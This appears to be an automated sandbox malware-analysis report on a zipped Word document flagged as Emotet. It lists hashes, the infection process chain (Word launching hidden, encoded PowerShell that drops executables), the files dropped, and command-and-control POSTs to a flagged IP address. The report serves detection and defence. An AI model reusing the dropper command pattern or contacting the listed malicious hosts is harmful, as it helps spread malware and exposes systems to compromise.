Field | Value
---|---
File name | UNTITLED_632586_T9336838.doc.zip
Full analysis | https://app.any.run/tasks/b7720a1e-d3ce-42b8-8114-749de9b4a376
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected in mass spam email campaigns.
Analysis date | May 20, 2019, 19:43:54
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/zip
File info | Zip archive data, at least v2.0 to extract
MD5 | 1D10DAE8A855CDA457603F0BB59093A5
SHA1 | 0C6DB1F069420F061FF5A9E529EB4E93D4243EF8
SHA256 | 827AC5109E43FA522A10544D6CC1651E0CCE727391E45CB8FD9A46FB82DCE848
SSDEEP | 1536:QX7CX5ASKpQljNQbpV+79nz7mjZW2SZsEA1WSG3ahDjwJMF3JqEzTGHH/ShB9Zy1:04EiNQbpVozrsEwWSnM2tkQkSjA
Field | Value
---|---
Detected type | .zip, ZIP compressed archive (100)
ZipRequiredVersion | 20
ZipBitFlag | -
ZipCompression | Deflated
ZipModifyDate | 2019:05:20 19:43:20
ZipCRC | 0xec064e6e
ZipCompressedSize | 81243
ZipUncompressedSize | 130432
ZipFileName | UNTITLED_632586_T9336838.doc
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
3316 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UNTITLED_632586_T9336838.doc.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0
3148 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3216 | powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e [base64-encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2640 | "C:\Users\admin\770.exe" | C:\Users\admin\770.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2748 | --1fcd1dee | C:\Users\admin\770.exe | — | 770.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
4024 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 770.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2592 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2720 | "C:\Users\admin\AppData\Local\soundser\27TaWa.exe" | C:\Users\admin\AppData\Local\soundser\27TaWa.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
3784 | --54b79703 | C:\Users\admin\AppData\Local\soundser\27TaWa.exe | — | 27TaWa.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
2812 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 27TaWa.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR113E.tmp.cvr | — | — | —
3216 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFXWN0O6X276TJDQWOJW.temp | — | — | —
2592 | soundser.exe | C:\Users\admin\AppData\Local\soundser\27TaWa.exe | executable | B1994F37B1CA47638931DD05D2A92727 | F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A
3216 | powershell.exe | C:\Users\admin\770.exe | executable | 9725D9368E642E74586456BBAD9F37B5 | 8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\~$TITLED_632586_T9336838.doc | pgc | 633F310DCFF68B75D5595D8813D077EA | DC4E790594796BF5E67673F904CB207C64D81E8FD70BFBD9012BEDF4D81EF376
2748 | 770.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 9725D9368E642E74586456BBAD9F37B5 | 8274749A1F4910E88944BC47D74AA0760CF6EB24712FCAFBC0D744047A9839E9
3784 | 27TaWa.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | B1994F37B1CA47638931DD05D2A92727 | F76FD135B6CA6580AB454F45BB27B67B55EF30D24E5E4B2423D3D351243FDD3A
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E839C6D.wmf | wmf | D9D7118DA48B5A042BBFD83E427173A5 | 78F9FCB0F03DE13835236497993D7D91C6E491AD125138D34A88A425DC44D643
3316 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3316.46614\UNTITLED_632586_T9336838.doc | document | 016FFFBE5A3CF1E23EF25C5393B821C3 | 9630E97DD14EE791FFCC2FAF3C333E3D19145F087026542EF5AE5A240D69E1F7
3148 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43A75F8A.wmf | wmf | 4DA40A42C6AF15E0CF721E5CF4061D7C | B9F68F39C8725D5792AB11F7FB3AE8530B393EE8C71E9426C1FC9D9DC523277E
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
456 | soundser.exe | POST | 200 | 74.207.227.96:443 | http://74.207.227.96:443/enable/schema/ringin/merge/ | US | binary | 148 b | malicious |
2592 | soundser.exe | POST | 200 | 74.207.227.96:443 | http://74.207.227.96:443/entries/ | US | binary | 65.9 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2592 | soundser.exe | 74.207.227.96:443 | — | Linode, LLC | US | malicious |
456 | soundser.exe | 74.207.227.96:443 | — | Linode, LLC | US | malicious |
3216 | powershell.exe | 69.90.66.10:443 | overcreative.com | Peer 1 Network (USA) Inc. | CA | unknown |
Domain | IP | Reputation
---|---|---
overcreative.com | | unknown
PID | Process | Class | Message |
---|---|---|---|
2592 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2592 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
456 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
456 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |